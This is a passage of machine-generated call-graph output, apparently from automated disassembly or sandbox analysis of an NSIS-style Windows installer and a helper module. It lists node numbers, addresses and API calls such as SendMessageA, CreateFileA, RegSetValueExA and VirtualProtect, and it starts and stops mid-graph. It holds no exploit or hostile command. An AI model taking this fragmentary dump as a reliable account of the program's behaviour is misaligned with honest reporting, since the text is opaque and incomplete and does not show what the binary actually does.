4877->4882 4883 404c66 SendMessageA 4877->4883 4884 404971 SendMessageA SendMessageA 4878->4884 4880 4049a3 4879->4880 4885 403f18 19 API calls 4880->4885 4881->4877 4886 404c07 SendMessageA 4881->4886 4911 404ab7 4881->4911 4893 404c84 ImageList_Destroy 4882->4893 4894 404c8b 4882->4894 4899 404c9b 4882->4899 4883->4882 4884->4875 4902 4049b1 4885->4902 4891 404c1c SendMessageA 4886->4891 4886->4911 4887 403f7f 8 API calls 4892 404e4d 4887->4892 4888 404ba0 SendMessageA 4888->4881 4890 404e01 4900 404e13 ShowWindow GetDlgItem ShowWindow 4890->4900 4890->4911 4897 404c2f 4891->4897 4893->4894 4895 404c94 GlobalFree 4894->4895 4894->4899 4895->4899 4896 404a85 GetWindowLongA SetWindowLongA 4901 404a9e 4896->4901 4908 404c40 SendMessageA 4897->4908 4898->4881 4898->4888 4899->4890 4907 40140b 2 API calls 4899->4907 4917 404ccd 4899->4917 4900->4911 4903 404aa4 ShowWindow 4901->4903 4904 404abc 4901->4904 4902->4896 4906 404a00 SendMessageA 4902->4906 4909 404a7f 4902->4909 4912 404a3c SendMessageA 4902->4912 4913 404a4d SendMessageA 4902->4913 4921 403f4d SendMessageA 4903->4921 4922 403f4d SendMessageA 4904->4922 4906->4902 4907->4917 4908->4877 4909->4896 4909->4901 4911->4887 4912->4902 4913->4902 4914 404dd7 InvalidateRect 4914->4890 4915 404ded 4914->4915 4928 4046f1 4915->4928 4916 404cfb SendMessageA 4920 404d11 4916->4920 4917->4916 4917->4920 4919 404d85 SendMessageA SendMessageA 4919->4920 4920->4914 4920->4919 4921->4911 4922->4874 4924 404832 SendMessageA 4923->4924 4925 4047f6 GetMessagePos ScreenToClient SendMessageA 4923->4925 4926 40482a 4924->4926 4925->4926 4927 40482f 4925->4927 4926->4898 4927->4924 4929 40470b 4928->4929 4930 405b88 18 API calls 4929->4930 4931 404740 4930->4931 4932 405b88 18 API calls 4931->4932 4933 40474b 4932->4933 4934 405b88 18 API calls 4933->4934 4935 40477c lstrlenA wsprintfA SetDlgItemTextA 4934->4935 4935->4890 4936 404e54 4937 404e62 4936->4937 4938 404e79 4936->4938 4940 404ee2 4937->4940 4941 404e68 4937->4941 4939 404e87 IsWindowVisible 4938->4939 4944 404e9e 4938->4944 4939->4940 4942 404e94 4939->4942 4943 404ee8 CallWindowProcA 4940->4943 4945 403f64 SendMessageA 4941->4945 4946 4047d3 5 API calls 4942->4946 4947 404e72 4943->4947 4944->4943 4955 405b66 lstrcpynA 4944->4955 4945->4947 4946->4944 4949 404ecd 4956 405ac4 wsprintfA 4949->4956 4951 404ed4 4952 40140b 2 API calls 4951->4952 4953 404edb 4952->4953 4957 405b66 lstrcpynA 4953->4957 4955->4949 4956->4951 4957->4940 4958 737510e0 4967 7375110e 4958->4967 4959 737511c4 GlobalFree 4960 737512ad 2 API calls 4960->4967 4961 737511c3 4961->4959 4962 737511ea GlobalFree 4962->4967 4963 73751266 2 API calls 4966 737511b1 GlobalFree 4963->4966 4964 73751155 GlobalAlloc 4964->4967 4965 737512d1 lstrcpyA 4965->4967 4966->4967 4967->4959 4967->4960 4967->4961 4967->4962 4967->4963 4967->4964 4967->4965 4967->4966 4968 404356 4969 404394 4968->4969 4970 404387 4968->4970 4972 40439d GetDlgItem 4969->4972 4978 404400 4969->4978 5029 40540b GetDlgItemTextA 4970->5029 4973 4043b1 4972->4973 4977 4043c5 SetWindowTextA 4973->4977 4982 4056ed 4 API calls 4973->4982 4974 4044e4 4979 404670 4974->4979 5031 40540b GetDlgItemTextA 4974->5031 4975 40438e 4976 405dc8 5 API calls 4975->4976 4976->4969 4983 403f18 19 API calls 4977->4983 4978->4974 4978->4979 4984 405b88 18 API calls 4978->4984 4981 403f7f 8 API calls 4979->4981 4986 404684 4981->4986 4987 4043bb 4982->4987 4988 4043e3 4983->4988 4989 404476 SHBrowseForFolderA 4984->4989 4985 404510 4990 40573a 18 API calls 4985->4990 4987->4977 4994 405659 3 API calls 4987->4994 4991 403f18 19 API calls 4988->4991 4989->4974 4992 40448e CoTaskMemFree 4989->4992 4993 404516 4990->4993 4995 4043f1 4991->4995 4996 405659 3 API calls 4992->4996 5032 405b66 lstrcpynA 4993->5032 4994->4977 5030 403f4d SendMessageA 4995->5030 4998 40449b 4996->4998 5001 4044d2 SetDlgItemTextA 4998->5001 5005 405b88 18 API calls 4998->5005 5000 4043f9 5003 405e88 3 API calls 5000->5003 5001->4974 5002 40452d 5004 405e88 3 API calls 5002->5004 5003->4978 5011 404535 5004->5011 5006 4044ba lstrcmpiA 5005->5006 5006->5001 5008 4044cb lstrcatA 5006->5008 5007 40456f 5033 405b66 lstrcpynA 5007->5033 5008->5001 5010 404578 5012 4056ed 4 API calls 5010->5012 5011->5007 5016 4056a0 2 API calls 5011->5016 5017 4045c2 5011->5017 5013 40457e GetDiskFreeSpaceA 5012->5013 5015 4045a0 MulDiv 5013->5015 5013->5017 5015->5017 5016->5011 5018 40461f 5017->5018 5020 4046f1 21 API calls 5017->5020 5019 404642 5018->5019 5021 40140b 2 API calls 5018->5021 5034 403f3a EnableWindow 5019->5034 5022 404611 5020->5022 5021->5019 5024 404621 SetDlgItemTextA 5022->5024 5025 404616 5022->5025 5024->5018 5026 4046f1 21 API calls 5025->5026 5026->5018 5027 40465e 5027->4979 5035 4042eb 5027->5035 5029->4975 5030->5000 5031->4985 5032->5002 5033->5010 5034->5027 5036 4042f9 5035->5036 5037 4042fe SendMessageA 5035->5037 5036->5037 5037->4979 5038 4014d6 5039 4029d9 18 API calls 5038->5039 5040 4014dc Sleep 5039->5040 5042 40288b 5040->5042 5043 73752be3 5044 73752bfb 5043->5044 5045 73751534 2 API calls 5044->5045 5046 73752c16 5045->5046 5052 4018d8 5053 40190f 5052->5053 5054 4029f6 18 API calls 5053->5054 5055 401914 5054->5055 5056 40548b 68 API calls 5055->5056 5057 40191d 5056->5057 5058 4018db 5059 4029f6 18 API calls 5058->5059 5060 4018e2 5059->5060 5061 405427 MessageBoxIndirectA 5060->5061 5062 4018eb 5061->5062 5063 404060 5064 404076 5063->5064 5069 404183 5063->5069 5066 403f18 19 API calls 5064->5066 5065 4041f2 5067 4042c6 5065->5067 5068 4041fc GetDlgItem 5065->5068 5070 4040cc 5066->5070 5075 403f7f 8 API calls 5067->5075 5071 404212 5068->5071 5072 404284 5068->5072 5069->5065 5069->5067 5073 4041c7 GetDlgItem SendMessageA 5069->5073 5074 403f18 19 API calls 5070->5074 5071->5072 5078 404238 6 API calls 5071->5078 5072->5067 5079 404296 5072->5079 5094 403f3a EnableWindow 5073->5094 5077 4040d9 CheckDlgButton 5074->5077 5086 4042c1 5075->5086 5092 403f3a EnableWindow 5077->5092 5078->5072 5082 40429c SendMessageA 5079->5082 5083 4042ad 5079->5083 5080 4041ed 5084 4042eb SendMessageA 5080->5084 5082->5083 5083->5086 5087 4042b3 SendMessageA 5083->5087 5084->5065 5085 4040f7 GetDlgItem 5093 403f4d SendMessageA 5085->5093 5087->5086 5089 40410d SendMessageA 5090 404134 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5089->5090 5091 40412b GetSysColor 5089->5091 5090->5086 5091->5090 5092->5085 5093->5089 5094->5080 5095 737515d1 5096 737514bb GlobalFree 5095->5096 5097 737515e9 5096->5097 5098 7375162f GlobalFree 5097->5098 5099 73751604 5097->5099 5100 7375161b VirtualFree 5097->5100 5099->5098 5100->5098 5101 401ae5 5102 4029f6 18 API calls 5101->5102 5103 401aec 5102->5103 5104 4029d9 18 API calls 5103->5104 5105 401af5 wsprintfA 5104->5105 5106 40288b 5105->5106 5107 402866 SendMessageA 5108 402880 InvalidateRect 5107->5108 5109 40288b 5107->5109 5108->5109 5117 4019e6 5118 4029f6 18 API calls 5117->5118 5119 4019ef ExpandEnvironmentStringsA 5118->5119 5120 401a03 5119->5120 5122 401a16 5119->5122 5121 401a08 lstrcmpA 5120->5121 5120->5122 5121->5122 5123 402267 5124 4029f6 18 API calls 5123->5124 5125 402275 5124->5125 5126 4029f6 18 API calls 5125->5126 5127 40227e 5126->5127 5128 4029f6 18 API calls 5127->5128 5129 402288 GetPrivateProfileStringA 5128->5129 5137 401c6d 5138 4029d9 18 API calls 5137->5138 5139 401c73 IsWindow 5138->5139 5140 4019d6 5139->5140 5141 40366d 5142 403678 5141->5142 5143 40367f GlobalAlloc 5142->5143 5144 40367c 5142->5144 5143->5144 5145 73751058 5147 73751074 5145->5147 5146 737510dc 5147->5146 5148 737514bb GlobalFree 5147->5148 5149 73751091 5147->5149 5148->5149 5150 737514bb GlobalFree 5149->5150 5151 737510a1 5150->5151 5152 737510b1 5151->5152 5153 737510a8 GlobalSize 5151->5153 5154 737510b5 GlobalAlloc 5152->5154 5155 737510c6 5152->5155 5153->5152 5156 737514e2 3 API calls 5154->5156 5157 737510d1 GlobalFree 5155->5157 5156->5155 5157->5146 5165 7375225a 5166 737522c4 5165->5166 5167 737522cf GlobalAlloc 5166->5167 5168 737522ee 5166->5168 5167->5166 5169 4014f0 SetForegroundWindow 5170 40288b 5169->5170 5171 402172 5172 4029f6 18 API calls 5171->5172 5173 402178 5172->5173 5174 4029f6 18 API calls 5173->5174 5175 402181 5174->5175 5176 4029f6 18 API calls 5175->5176 5177 40218a 5176->5177 5178 405e61 2 API calls 5177->5178 5179 402193 5178->5179 5180 4021a4 lstrlenA lstrlenA 5179->5180 5184 402197 5179->5184 5182 404f04 25 API calls 5180->5182 5181 404f04 25 API calls 5185 40219f 5181->5185 5183 4021e0 SHFileOperationA 5182->5183 5183->5184 5183->5185 5184->5181 5184->5185 5186 4021f4 5187 4021fb 5186->5187 5190 40220e 5186->5190 5188 405b88 18 API calls 5187->5188 5189 402208 5188->5189 5189->5190 5191 405427 MessageBoxIndirectA 5189->5191 5191->5190 5192 4016fa 5193 4029f6 18 API calls 5192->5193 5194 401701 SearchPathA 5193->5194 5195 40171c 5194->5195 5196 4025fb 5197 402602 5196->5197 5198 40288b 5196->5198 5199 402608 FindClose 5197->5199 5199->5198 5200 40267c 5201 4029f6 18 API calls 5200->5201 5203 40268a 5201->5203 5202 4026a0 5205 40581e 2 API calls 5202->5205 5203->5202 5204 4029f6 18 API calls 5203->5204 5204->5202 5206 4026a6 5205->5206 5226 40583d GetFileAttributesA CreateFileA 5206->5226 5208 4026b3 5209 40275c 5208->5209 5210 4026bf GlobalAlloc 5208->5210 5213 402764 DeleteFileA 5209->5213 5214 402777 5209->5214 5211 402753 CloseHandle 5210->5211 5212 4026d8 5210->5212 5211->5209 5227 4031f1 SetFilePointer 5212->5227 5213->5214 5216 4026de 5217 4031bf ReadFile 5216->5217 5218 4026e7 GlobalAlloc 5217->5218 5219 4026f7 5218->5219 5220 40272b WriteFile GlobalFree 5218->5220 5221 402f18 48 API calls 5219->5221 5222 402f18 48 API calls 5220->5222 5223 402704 5221->5223 5224 402750 5222->5224 5225 402722 GlobalFree 5223->5225 5224->5211 5225->5220 5226->5208 5227->5216 5235 40277d 5236 4029d9 18 API calls 5235->5236 5237 402783 5236->5237 5238 4027a7 5237->5238 5239 4027be 5237->5239 5245 40265c 5237->5245 5242 4027ac 5238->5242 5248 4027bb 5238->5248 5240 4027d4 5239->5240 5241 4027c8 5239->5241 5244 405b88 18 API calls 5240->5244 5243 4029d9 18 API calls 5241->5243 5249 405b66 lstrcpynA 5242->5249 5243->5248 5244->5248 5248->5245 5250 405ac4 wsprintfA 5248->5250 5249->5245 5250->5245 5251 4014fe 5252 401506 5251->5252 5254 401519 5251->5254 5253 4029d9 18 API calls 5252->5253 5253->5254 5255 401000 5256 401037 BeginPaint GetClientRect 5255->5256 5257 40100c DefWindowProcA 5255->5257 5258 4010f3 5256->5258 5260 401179 5257->5260 5261 401073 CreateBrushIndirect FillRect DeleteObject 5258->5261 5262 4010fc 5258->5262 5261->5258 5263 401102 CreateFontIndirectA 5262->5263 5264 401167 EndPaint 5262->5264 5263->5264 5265 401112 6 API calls 5263->5265 5264->5260 5265->5264 5266 73751837 5267 7375185a 5266->5267 5268 7375188a GlobalFree 5267->5268 5269 7375189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5267->5269 5268->5269 5270 73751266 2 API calls 5269->5270 5271 73751a1e GlobalFree GlobalFree 5270->5271 5272 402803 5273 4029d9 18 API calls 5272->5273 5274 402809 5273->5274 5275 40283a 5274->5275 5277 40265c 5274->5277 5278 402817 5274->5278 5276 405b88 18 API calls 5275->5276 5275->5277 5276->5277 5278->5277 5280 405ac4 wsprintfA 5278->5280 5280->5277 5281 402303 5282 402309 5281->5282 5283 4029f6 18 API calls 5282->5283 5284 40231b 5283->5284 5285 4029f6 18 API calls 5284->5285 5286 402325 RegCreateKeyExA 5285->5286 5287 40234f 5286->5287 5291 40265c 5286->5291 5288 402367 5287->5288 5289 4029f6 18 API calls 5287->5289 5290 402373 5288->5290 5293 4029d9 18 API calls 5288->5293 5292 402360 lstrlenA 5289->5292 5294 40238e RegSetValueExA 5290->5294 5295 402f18 48 API calls 5290->5295 5292->5288 5293->5290 5296 4023a4 RegCloseKey 5294->5296 5295->5294 5296->5291 5298 401b06 5299 401b13 5298->5299 5300 401b57 5298->5300 5303 4021fb 5299->5303 5306 401b2a 5299->5306 5301 401b80 GlobalAlloc 5300->5301 5302 401b5b 5300->5302 5304 405b88 18 API calls 5301->5304 5311 401b9b 5302->5311 5319 405b66 lstrcpynA 5302->5319 5305 405b88 18 API calls 5303->5305 5304->5311 5308 402208 5305->5308 5317 405b66 lstrcpynA 5306->5317 5308->5311 5312 405427 MessageBoxIndirectA 5308->5312 5310 401b6d GlobalFree 5310->5311 5312->5311 5313 401b39 5318 405b66 lstrcpynA 5313->5318 5315 401b48 5320 405b66 lstrcpynA 5315->5320 5317->5313 5318->5315 5319->5310 5320->5311 5321 402506 5322 4029d9 18 API calls 5321->5322 5323 402510 5322->5323 5324 402544 ReadFile 5323->5324 5325 402588 5323->5325 5326 402598 5323->5326 5329 402586 5323->5329 5324->5323 5324->5329 5330 405ac4 wsprintfA 5325->5330 5328 4025ae SetFilePointer 5326->5328 5326->5329 5328->5329 5330->5329 5331 7375103d 5334 7375101b 5331->5334 5335 737514bb GlobalFree 5334->5335 5336 73751020 5335->5336 5337 73751024 5336->5337 5338 73751027 GlobalAlloc 5336->5338 5339 737514e2 3 API calls 5337->5339 5338->5337 5340 7375103b 5339->5340 4323 401389 4325 401390 4323->4325 4324 4013fe 4325->4324 4326 4013cb MulDiv SendMessageA 4325->4326 4326->4325 5341 401c8a 5342 4029d9 18 API calls 5341->5342 5343 401c91 5342->5343 5344 4029d9 18 API calls 5343->5344 5345 401c99 GetDlgItem 5344->5345 5346 4024b8 5345->5346 5347 40468b 5348 4046b7 5347->5348 5349 40469b 5347->5349 5351 4046ea 5348->5351 5352 4046bd SHGetPathFromIDListA 5348->5352 5358 40540b GetDlgItemTextA 5349->5358 5354 4046d4 SendMessageA 5352->5354 5355 4046cd 5352->5355 5353 4046a8 SendMessageA 5353->5348 5354->5351 5356 40140b 2 API calls 5355->5356 5356->5354 5358->5353 5359 73751638 5360 73751667 5359->5360 5361 73751a98 18 API calls 5360->5361 5362 7375166e 5361->5362 5363 73751675 5362->5363 5364 73751681 5362->5364 5367 73751266 2 API calls 5363->5367 5365 737516a8 5364->5365 5366 7375168b 5364->5366 5369 737516d2 5365->5369 5370 737516ae 5365->5370 5368 737514e2 3 API calls 5366->5368 5371 7375167f 5367->5371 5373 73751690 5368->5373 5372 737514e2 3 API calls 5369->5372 5374 73751559 3 API calls 5370->5374 5372->5371 5375 73751559 3 API calls 5373->5375 5376 737516b3 5374->5376 5377 73751696 5375->5377 5378 73751266 2 API calls 5376->5378 5379 73751266 2 API calls 5377->5379 5380 737516b9 GlobalFree 5378->5380 5381 7375169c GlobalFree 5379->5381 5380->5371 5382 737516cd GlobalFree 5380->5382 5381->5371 5382->5371 5383 40430f 5384 404345 5383->5384 5385 40431f 5383->5385 5387 403f7f 8 API calls 5384->5387 5386 403f18 19 API calls 5385->5386 5388 40432c SetDlgItemTextA 5386->5388 5389 404351 5387->5389 5388->5384 5390 401490 5391 404f04 25 API calls 5390->5391 5392 401497 5391->5392 4206 73752921 4207 73752971 4206->4207 4208 73752931 VirtualProtect 4206->4208 4208->4207 5393 402615 5394 402618 5393->5394 5396 402630 5393->5396 5395 402625 FindNextFileA 5394->5395 5395->5396 5397 40266f 5395->5397 5399 405b66 lstrcpynA 5397->5399 5399->5396 5407 401e95 5408 4029f6 18 API calls 5407->5408 5409 401e9c 5408->5409 5410 405e61 2 API calls 5409->5410 5411 401ea2 5410->5411 5412 401eb4 5411->5412 5414 405ac4 wsprintfA 5411->5414 5414->5412 5415 401595 5416 4029f6 18 API calls 5415->5416 5417 40159c SetFileAttributesA 5416->5417 5418 4015ae 5417->5418 5419 401d95 5420 4029d9 18 API calls 5419->5420 5421 401d9b 5420->5421 5422 4029d9 18 API calls 5421->5422 5423 401da4 5422->5423 5424 401db6 EnableWindow 5423->5424 5425 401dab ShowWindow 5423->5425 5426 40288b 5424->5426 5425->5426 5427 401696 5428 4029f6 18 API calls 5427->5428 5429 40169c GetFullPathNameA 5428->5429 5430 4016b3 5429->5430 5436 4016d4 5429->5436 5433 405e61 2 API calls 5430->5433 5430->5436 5431 4016e8 GetShortPathNameA 5432 40288b 5431->5432 5434 4016c4 5433->5434 5434->5436 5437 405b66 lstrcpynA 5434->5437 5436->5431 5436->5432 5437->5436 5438 401e1b 5439 4029f6 18 API calls 5438->5439 5440 401e21 5439->5440 5441 404f04 25 API calls 5440->5441 5442 401e2b 5441->5442 5443 4053c6 2 API calls 5442->5443 5446 401e31 5443->5446 5444 401e87 CloseHandle 5448 40265c 5444->5448 5445 401e50 WaitForSingleObject 5445->5446 5447 401e5e GetExitCodeProcess 5445->5447 5446->5444 5446->5445 5446->5448 5451 405ec1 2 API calls 5446->5451 5449 401e70 5447->5449 5450 401e79 5447->5450 5453 405ac4 wsprintfA 5449->5453 5450->5444 5451->5445 5453->5450 5454 401d1b GetDC GetDeviceCaps 5455 4029d9 18 API calls 5454->5455 5456 401d37 MulDiv 5455->5456 5457 4029d9 18 API calls 5456->5457 5458 401d4c 5457->5458 5459 405b88 18 API calls 5458->5459 5460 401d85 CreateFontIndirectA 5459->5460 5461 4024b8 5460->5461 5462 40249c 5463 4029f6 18 API calls 5462->5463 5464 4024a3 5463->5464 5467 40583d GetFileAttributesA CreateFileA 5464->5467 5466 4024af 5467->5466 5468 402020 5469 4029f6 18 API calls 5468->5469 5470 402027 5469->5470 5471 4029f6 18 API calls 5470->5471 5472 402031 5471->5472 5473 4029f6 18 API calls 5472->5473 5474 40203a 5473->5474 5475 4029f6 18 API calls 5474->5475 5476 402044 5475->5476 5477 4029f6 18 API calls 5476->5477 5479 40204e 5477->5479 5478 402062 CoCreateInstance 5483 402081 5478->5483 5484 402137 5478->5484 5479->5478 5480 4029f6 18 API calls 5479->5480 5480->5478 5481 401423 25 API calls 5482 402169 5481->5482 5483->5484 5485 402116 MultiByteToWideChar 5483->5485 5484->5481 5484->5482 5485->5484 4171 401721 4172 4029f6 18 API calls 4171->4172 4173 401728 4172->4173 4177 40586c 4173->4177 4175 40172f 4176 40586c 2 API calls 4175->4176 4176->4175 4178 405877 GetTickCount GetTempFileNameA 4177->4178 4179 4058a7 4178->4179 4180 4058a3 4178->4180 4179->4175 4180->4178 4180->4179 5486 401922 5487 4029f6 18 API calls 5486->5487 5488 401929 lstrlenA 5487->5488 5489 4024b8 5488->5489 5490 402223 5491 402231 5490->5491 5492 40222b 5490->5492 5494 4029f6 18 API calls 5491->5494 5495 402241 5491->5495 5493 4029f6 18 API calls 5492->5493 5493->5491 5494->5495 5496 4029f6 18 API calls 5495->5496 5498 40224f 5495->5498 5496->5498 5497 4029f6 18 API calls 5499 402258 WritePrivateProfileStringA 5497->5499 5498->5497 5507 401ca5 5508 4029d9 18 API calls 5507->5508 5509 401cb5 SetWindowLongA 5508->5509 5510 40288b 5509->5510 5511 401a26 5512 4029d9 18 API calls 5511->5512 5513 401a2c 5512->5513 5514 4029d9 18 API calls 5513->5514 5515 4019d6 5514->5515 5516 402427 5526 402b00 5516->5526 5518 402431 5519 4029d9 18 API calls 5518->5519 5520 40243a 5519->5520 5521 402451 RegEnumKeyA 5520->5521 5522 40245d RegEnumValueA 5520->5522 5523 40265c 5520->5523 5524 402476 RegCloseKey 5521->5524 5522->5523 5522->5524 5524->5523 5527 4029f6 18 API calls 5526->5527 5528 402b19 5527->5528 5529 402b27 RegOpenKeyExA 5528->5529 5529->5518 5530 4022a7 5531 4022d7 5530->5531 5532 4022ac 5530->5532 5534 4029f6 18 API calls 5531->5534 5533 402b00 19 API calls 5532->5533 5535 4022b3 5533->5535 5536 4022de 5534->5536 5537 4029f6 18 API calls 5535->5537 5540 4022f4 5535->5540 5541 402a36 RegOpenKeyExA 5536->5541 5539 4022c4 RegDeleteValueA RegCloseKey 5537->5539 5539->5540 5548 402a61 5541->5548 5550 402aad 5541->5550 5542 402a87 RegEnumKeyA 5543 402a99 RegCloseKey 5542->5543 5542->5548 5544 405e88 3 API calls 5543->5544 5546 402aa9 5544->5546 5545 402abe RegCloseKey 5545->5550 5549 402ad9 RegDeleteKeyA 5546->5549 5546->5550 5547 402a36 3 API calls 5547->5548 5548->5542 5548->5543 5548->5545 5548->5547 5549->5550 5550->5540 5551 40402c lstrcpynA lstrlenA 5552 401bad 5553 4029d9 18 API calls 5552->5553 5554 401bb4 5553->5554 5555 4029d9 18 API calls 5554->5555 5556 401bbe 5555->5556 5557 401bce 5556->5557 5558 4029f6 18 API calls 5556->5558 5559 401bde 5557->5559 5560 4029f6 18 API calls 5557->5560 5558->5557 5561 401be9 5559->5561 5562 401c2d 5559->5562 5560->5559 5564 4029d9 18 API calls 5561->5564 5563 4029f6 18 API calls 5562->5563 5565 401c32 5563->5565 5566 401bee 5564->5566 5568 4029f6 18 API calls 5565->5568 5567 4029d9 18 API calls 5566->5567 5569 401bf7 5567->5569 5570 401c3b FindWindowExA 5568->5570 5571 401c1d SendMessageA 5569->5571 5572 401bff SendMessageTimeoutA 5569->5572 5573 401c59 5570->5573 5571->5573 5572->5573 4653 7375101b 4660 737514bb 4653->4660 4655 73751020 4656 73751024 4655->4656 4657 73751027 GlobalAlloc 4655->4657 4658 737514e2 3 API calls 4656->4658 4657->4656 4659 7375103b 4658->4659 4662 737514c1 4660->4662 4661 737514c7 4661->4655 4662->4661 4663 737514d3 GlobalFree 4662->4663 4663->4655 5574 4023af 5575 402b00 19 API calls 5574->5575 5576 4023b9 5575->5576 5577 4029f6 18 API calls 5576->5577 5578 4023c2 5577->5578 5579 4023cc RegQueryValueExA 5578->5579 5583 40265c 5578->5583 5580 4023f2 RegCloseKey 5579->5580 5581 4023ec 5579->5581 5580->5583 5581->5580 5585 405ac4 wsprintfA 5581->5585 5585->5580 5586 406131 5587 405fb5 5586->5587 5588 406920 5587->5588 5589 406036 GlobalFree 5587->5589 5590 40603f GlobalAlloc 5587->5590 5591 4060b6 GlobalAlloc 5587->5591 5592 4060ad GlobalFree 5587->5592 5589->5590 5590->5587 5590->5588 5591->5587 5591->5588 5592->5591 4181 4015b3 4182 4029f6 18 API calls 4181->4182 4183 4015ba 4182->4183 4199 4056ed CharNextA CharNextA 4183->4199 4185 40160a 4186 40162d 4185->4186 4187 40160f 4185->4187 4192 401423 25 API calls 4186->4192 4189 401423 25 API calls 4187->4189 4188 405684 CharNextA 4190 4015d0 CreateDirectoryA 4188->4190 4191 401616 4189->4191 4193 4015e5 GetLastError 4190->4193 4196 4015c2 4190->4196 4205 405b66 lstrcpynA 4191->4205 4198 402169 4192->4198 4195 4015f2 GetFileAttributesA 4193->4195 4193->4196 4195->4196 4196->4185 4196->4188 4197 401621 SetCurrentDirectoryA 4197->4198 4200 405707 4199->4200 4204 405713 4199->4204 4201 40570e CharNextA 4200->4201 4200->4204 4202 405730 4201->4202 4202->4196 4203 405684 CharNextA 4203->4204 4204->4202 4204->4203 4205->4197 4209 401734 4210 4029f6 18 API calls 4209->4210 4211 40173b 4210->4211 4212 401761 4211->4212 4213 401759 4211->4213 4264 405b66 lstrcpynA 4212->4264 4263 405b66 lstrcpynA 4213->4263 4216 40175f 4220 405dc8 5 API calls 4216->4220 4217 40176c 4265 405659 lstrlenA CharPrevA 4217->4265 4224 40177e 4220->4224 4225 401795 CompareFileTime 4224->4225 4226 401859 4224->4226 4227 401830 4224->4227 4230 405b66 lstrcpynA 4224->4230 4236 405b88 18 API calls 4224->4236 4247 40583d GetFileAttributesA CreateFileA 4224->4247 4268 405e61 FindFirstFileA 4224->4268 4271 40581e GetFileAttributesA 4224->4271 4274 405427 4224->4274 4225->4224 4228 404f04 25 API calls 4226->4228 4229 404f04 25 API calls 4227->4229 4245 401845 4227->4245 4231 401863 4228->4231 4229->4245 4230->4224 4248 402f18 4231->4248 4234 40188a SetFileTime 4235 40189c FindCloseChangeNotification 4234->4235 4237 4018ad 4235->4237 4235->4245 4236->4224 4238 4018b2 4237->4238 4239 4018c5 4237->4239 4240 405b88 18 API calls 4238->4240 4241 405b88 18 API calls 4239->4241 4242 4018ba lstrcatA 4240->4242 4243 4018cd 4241->4243 4242->4243 4243->4245 4246 405427 MessageBoxIndirectA 4243->4246 4246->4245 4247->4224 4249 402f45 4248->4249 4250 402f29 SetFilePointer 4248->4250 4278 403043 GetTickCount 4249->4278 4250->4249 4253 402f56 ReadFile 4254 402f76 4253->4254 4261 401876 4253->4261 4255 403043 43 API calls 4254->4255 4254->4261 4256 402f8d 4255->4256 4257 403008 ReadFile 4256->4257 4256->4261 4262 402f9d 4256->4262 4257->4261 4259 402fb8 ReadFile 4259->4261 4259->4262 4260 402fd1 WriteFile 4260->4261 4260->4262 4261->4234 4261->4235 4262->4259 4262->4260 4262->4261 4263->4216 4264->4217 4266 405673 lstrcatA 4265->4266 4267 401772 lstrcatA 4265->4267 4266->4267 4267->4216 4269 405e82 4268->4269 4270 405e77 FindClose 4268->4270 4269->4224 4270->4269 4272 40583a 4271->4272 4273 40582d SetFileAttributesA 4271->4273 4272->4224 4273->4272 4275 40543c 4274->4275 4276 405450 MessageBoxIndirectA 4275->4276 4277 405488 4275->4277 4276->4277 4277->4224 4279 403072 4278->4279 4280 4031ad 4278->4280 4291 4031f1 SetFilePointer 4279->4291 4281 402bd3 33 API calls 4280->4281 4287 402f4e 4281->4287 4283 40307d SetFilePointer 4289 4030a2 4283->4289 4287->4253 4287->4261 4288 403137 WriteFile 4288->4287 4288->4289 4289->4287 4289->4288 4290 40318e SetFilePointer 4289->4290 4292 4031bf ReadFile 4289->4292 4294 405f82 4289->4294 4301 402bd3 4289->4301 4290->4280 4291->4283 4293 4031e0 4292->4293 4293->4289 4295 405fa7 4294->4295 4300 405faf 4294->4300 4295->4289 4296 406036 GlobalFree 4297 40603f GlobalAlloc 4296->4297 4297->4295 4297->4300 4298 4060b6 GlobalAlloc 4298->4295 4298->4300 4299 4060ad GlobalFree 4299->4298 4300->4295 4300->4296 4300->4297 4300->4298 4300->4299 4302 402be1 4301->4302 4303 402bf9 4301->4303 4306 402bf1 4302->4306 4307 402bea DestroyWindow 4302->4307 4304 402c01 4303->4304 4305 402c09 GetTickCount 4303->4305 4316 405ec1 4304->4316 4305->4306 4309 402c17 4305->4309 4306->4289 4307->4306 4310 402c4c CreateDialogParamA ShowWindow 4309->4310 4311 402c1f 4309->4311 4310->4306 4311->4306 4320 402bb7 4311->4320 4313 402c2d wsprintfA 4314 404f04 25 API calls 4313->4314 4315 402c4a 4314->4315 4315->4306 4317 405ede PeekMessageA 4316->4317 4318 405ed4 DispatchMessageA 4317->4318 4319 405eee 4317->4319 4318->4317 4319->4306 4321 402bc6 4320->4321 4322 402bc8 MulDiv 4320->4322 4321->4322 4322->4313 5593 401634 5594 4029f6 18 API calls 5593->5594 5595 40163a 5594->5595 5596 405e61 2 API calls 5595->5596 5597 401640 5596->5597 5598 401934 5599 4029d9 18 API calls 5598->5599 5600 40193b 5599->5600 5601 4029d9 18 API calls 5600->5601 5602 401945 5601->5602 5603 4029f6 18 API calls 5602->5603 5604 40194e 5603->5604 5605 401961 lstrlenA 5604->5605 5606 40199c 5604->5606 5607 40196b 5605->5607 5607->5606 5611 405b66 lstrcpynA 5607->5611 5609 401985 5609->5606 5610 401992 lstrlenA 5609->5610 5610->5606 5611->5609 5612 73751000 5613 7375101b 5 API calls 5612->5613 5614 73751019 5613->5614 5615 4019b5 5616 4029f6 18 API calls 5615->5616 5617 4019bc 5616->5617 5618 4029f6 18 API calls 5617->5618 5619 4019c5 5618->5619 5620 4019cc lstrcmpiA 5619->5620 5621 4019de lstrcmpA 5619->5621 5622 4019d2 5620->5622 5621->5622 5623 4014b7 5624 4014bd 5623->5624 5625 401389 2 API calls 5624->5625 5626 4014c5 5625->5626 5634 402b3b 5635 402b63 5634->5635 5636 402b4a SetTimer 5634->5636 5637 402bb1 5635->5637 5638 402bb7 MulDiv 5635->5638 5636->5635 5639 402b71 wsprintfA SetWindowTextA SetDlgItemTextA 5638->5639 5639->5637 4327 40323c #17 SetErrorMode OleInitialize 4397 405e88 GetModuleHandleA 4327->4397 4331 4032aa GetCommandLineA 4402 405b66 lstrcpynA 4331->4402 4333 4032bc GetModuleHandleA 4334 4032d3 4333->4334 4335 405684 CharNextA 4334->4335 4336 4032e7 CharNextA 4335->4336 4340 4032f4 4336->4340 4337 40335d 4338 403370 GetTempPathA 4337->4338 4403 403208 4338->4403 4340->4337 4342 405684 CharNextA 4340->4342 4348 40335f 4340->4348 4341 403386 4343 4033aa DeleteFileA 4341->4343 4344 40338a GetWindowsDirectoryA lstrcatA 4341->4344 4342->4340 